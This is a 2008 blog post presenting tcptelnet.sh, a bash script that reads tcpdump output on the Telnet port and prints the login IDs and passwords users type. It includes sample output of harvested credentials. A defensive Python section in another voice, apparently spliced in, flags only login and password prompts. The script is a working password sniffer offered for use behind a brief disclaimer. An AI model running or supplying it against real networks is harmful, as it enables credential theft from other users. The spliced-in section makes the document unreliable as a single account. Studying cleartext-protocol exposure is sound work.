Tuesday, April 29, 2008

Grabbing Telnet Information On Linux Using TcpDump

Hello again,

Today, I thought we'd continue along our "snooping" path and clear the way for a solution that would satisfy more than one operating system. Snoop, although a fine program in my estimation, isn't available except on Solaris Unix (if I'm wrong, please let me know :). After yesterday's post on snooping the FTP port and our earlier post on capturing logins and passwords over Telnet with snoop, it seemed like it was about time to get back to Linux.

Linux may not have the "snoop" command, but it hardly matters, since free programs like tcpdump, ethereal, snort, etc. are all out there and can be compiled on pretty much any system (if your Linux distro doesn't already have a package readily available, which is doubtful ;).

For a more detailed look at the "process" involved in our tcpdump'ing, check out the old post on capturing logins and passwords, even though it was for Solaris. The method of achieving the end result is so similar, and it took up so much HTML real estate to convey, that it would be annoying (to put it mildly) to slap it right in the middle of this post :)

In any event, today we've written a quick bash shell script called "tcptelnet.sh." It takes standard input (STDIN) as its source (which can be fairly easily modified) and was made to run in a pipe chain after a tcpdump command of the format below:

host # tcpdump -l -vvv -x -X port 23 | ./tcptelnet.sh

Just so you have all the info in one place, the command line arguments used here are: -l (to make standard output (STDOUT) line buffered, so the script sees each line as it is written, which also makes it easier to read), -vvv (to make the output very, very verbose), -x and -X (to print in hex and ASCII, print out headers and pad packets with null bytes).

The format of the tcpdump command matters because changing it would change the way tcpdump lays out its output, and the "tcptelnet.sh" script (much like our other shell scripts on this topic) is a simple parser that makes that output more readable. Note also that you must be the "root" user (or have equivalent privilege on the host you're running the script from) for this to work. This is not a way to "hack" or "get around" Linux security. It's just a demonstration of how readily available all unsecured information is, even on a secured network.

Following is a sample of the output you should expect. Note that, given tcpdump's output format and my desire not to repeat the unnecessary complexity of our snoop script, I sacrificed the capital U for the sake of all-around convenience. This only matters in that, if you see a dot (.) where you think there should be a character, it's probably a capital U. All of the strings our command generates show these on the echo-backs, and I chose to parse only those, since they get sent with all regular, as well as password, information. You are, of course, welcome to make this shell script better. The nature of network traffic makes it a bit difficult to pin things down to absolutes, I've found ;)

And here's that sample session:

host # tcpdump -l -vvv -x -X port 23 |./tcptelnet.sh
tcpdump: listening on qfe0, link-type EN10MB (Ethernet), capture size 68 bytes

Possible session info to follow:
u.s.e.r.0.0.1..
Possible password to follow:
.listpy..
Possible login ID to follow:
.u.s.e.r.0.0.1..
Possible password to follow:
.sm0k3BomB..
Possible login ID to follow:
.h...m.m.e.r..
Possible password to follow:
.H.MM.S........
Possible login ID to follow:
.u.s.e.r.0.0.1..
Possible password to follow:
.MyS3cr3tP@ssw0rd.

Possible session info to follow:
....l.s...pw.d...e.x.i.t...^C254 packets captured
891 packets received by filter
0 packets dropped by kernel


As I noted above, the capital U gets whacked on some lines due to the output format and the way we process it in the bash script. For instance, the line that reads:

.h...m.m.e.r

was actually typed into the Telnet session as:

hUmmer

Once you note the pattern of input (and know that this is the only letter, and only in capital form, that is excluded from our matches), it becomes fairly simple to fill in that small blank.
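Decoding the hex column instead of the ASCII column sidesteps the lost capital U entirely. What a defender usually wants from the same capture is not the typed text but an alert that cleartext telnet authentication is happening at all, so here is an added Python example (my code, not the post's script) that parses the tcpdump -x/-X layout the post relies on and flags only the server's login: and Password: prompts; the dump, addresses and ports in SAMPLE are constructed for the example.

```python
# Constructed sample of "tcpdump -l -vvv -x -X port 23" output (not a real capture):
# a login: prompt, one client keystroke, then a Password: prompt on one session.
SAMPLE = """\
10:00:00.000001 IP (tos 0x10, ttl 64, id 1, offset 0, flags [DF], proto TCP (6), length 46)
    10.0.0.5.23 > 10.0.0.9.41234: Flags [P.], seq 1:7, ack 1, win 229, length 6
\t0x0000:  4510 002e 0001 4000 4006 0000 0a00 0005  E...............
\t0x0010:  0a00 0009 0017 a112 0000 0001 0000 0001  ................
\t0x0020:  5018 00e5 0000 0000 6c6f 6769 6e3a       P.......login:
10:00:00.000002 IP (tos 0x10, ttl 64, id 2, offset 0, flags [DF], proto TCP (6), length 41)
    10.0.0.9.41234 > 10.0.0.5.23: Flags [P.], seq 1:2, ack 7, win 229, length 1
\t0x0000:  4510 0029 0002 4000 4006 0000 0a00 0009  E..)............
\t0x0010:  0a00 0005 a112 0017 0000 0001 0000 0007  ................
\t0x0020:  5018 00e5 0000 0000 75                   P.......u
10:00:00.000003 IP (tos 0x10, ttl 64, id 3, offset 0, flags [DF], proto TCP (6), length 49)
    10.0.0.5.23 > 10.0.0.9.41234: Flags [P.], seq 7:16, ack 2, win 229, length 9
\t0x0000:  4510 0031 0003 4000 4006 0000 0a00 0005  E..1............
\t0x0010:  0a00 0009 0017 a112 0000 0007 0000 0002  ................
\t0x0020:  5018 00e5 0000 0000 5061 7373 776f 7264  P.......Password
\t0x0030:  3a                                       :
"""

def packets(dump_text):
    """Yield each packet's bytes rebuilt from the hex column (-x omits the link-level header)."""
    hexparts = []
    for line in dump_text.splitlines() + [""]:  # "" sentinel flushes the last packet
        if line.lstrip().startswith("0x"):  # hex groups, two spaces, then the ASCII column
            hexparts.append(line.split(":", 1)[1].strip().split("  ")[0].replace(" ", ""))
        elif hexparts and not line.startswith((" ", "\t")):  # next packet's header line
            yield bytes.fromhex("".join(hexparts))
            hexparts = []

def tcp_payload(pkt):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP packet, else None."""
    if len(pkt) < 40 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        return None
    ihl, total = (pkt[0] & 0x0F) * 4, int.from_bytes(pkt[2:4], "big")
    doff = (pkt[ihl + 12] >> 4) * 4
    src, dst = ".".join(map(str, pkt[12:16])), ".".join(map(str, pkt[16:20]))
    sport, dport = int.from_bytes(pkt[ihl:ihl + 2], "big"), int.from_bytes(pkt[ihl + 2:ihl + 4], "big")
    # a small snaplen (the post's capture shows "capture size 68 bytes") truncates the payload
    return src, sport, dst, dport, pkt[ihl + doff:min(total, len(pkt))]

PROMPTS = {b"login:": "login", b"assword:": "password"}  # "assword:" covers both cases

def telnet_auth_alerts(dump_text):
    """Flag cleartext telnet prompts sent by the server; typed client data is never kept."""
    flows = [f for f in map(tcp_payload, packets(dump_text)) if f and f[1] == 23]  # server side only
    return [(kind, f"{s}:{sp}", f"{d}:{dp}") for s, sp, d, dp, data in flows
            for marker, kind in PROMPTS.items() if marker in data]
```

Run against a live `tcpdump -l -vvv -x -X port 23` feed this yields one record per prompt, which is the event to forward to a SIEM; the client's keystroke packet is parsed but discarded by the port-23 filter.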

Hope you enjoy this script and do "good things" with it. Use it for security, not insecurity :)

Cheers,


This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.

#!/bin/bash

#
# tcptelnet.sh - extract password and session information from tcpdump output
#
# 2008 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#
# Reads the output of "tcpdump -l -vvv -x -X port 23" on standard input and
# prints the characters echoed back after a login or password prompt.

login_or_pwd=0   # 1 while inside a login/password exchange
sess_info=0      # 1 while printing ordinary session keystrokes

while read -r line
do
    # The "Last login:" banner marks the end of the authentication exchange
    if echo "$line" | grep -q "Last"
    then
        echo
        login_or_pwd=0
        continue
    fi
    # "login:" prompt
    if echo "$line" | grep -q "gin:"
    then
        echo
        echo "Possible login ID to follow: "
        login_or_pwd=1
        sess_info=0
        continue
    fi
    # "Password:" prompt
    if echo "$line" | grep -q "sword"
    then
        echo
        echo "Possible password to follow: "
        login_or_pwd=1
        sess_info=0
        continue
    fi
    # Outside a login/password exchange, open a session-info block once
    if [ "$login_or_pwd" -eq 0 ] && [ "$sess_info" -eq 0 ]
    then
        echo
        echo "Possible session info to follow:"
        sess_info=1
    fi
    # Echo-back lines: the last field of the tcpdump line ends in UUUUU, and the
    # character just before that run is the one echoed back. A leading U is
    # turned into a dot, which is why a capital U never shows up in the output.
    # tr strips the newline so the characters print on one line (the original
    # used 'xargs -ivar echo "var\c"', which relies on echo honouring \c).
    echo "$line" | awk '{ if ( $NF ~ /UUUUU$/ ) print $NF }' \
        | sed 's/^.*\(.\)UUUUU$/\1/' | sed 's/^U/\./' | tr -d '\n'
done
echo
exit 0


, Mike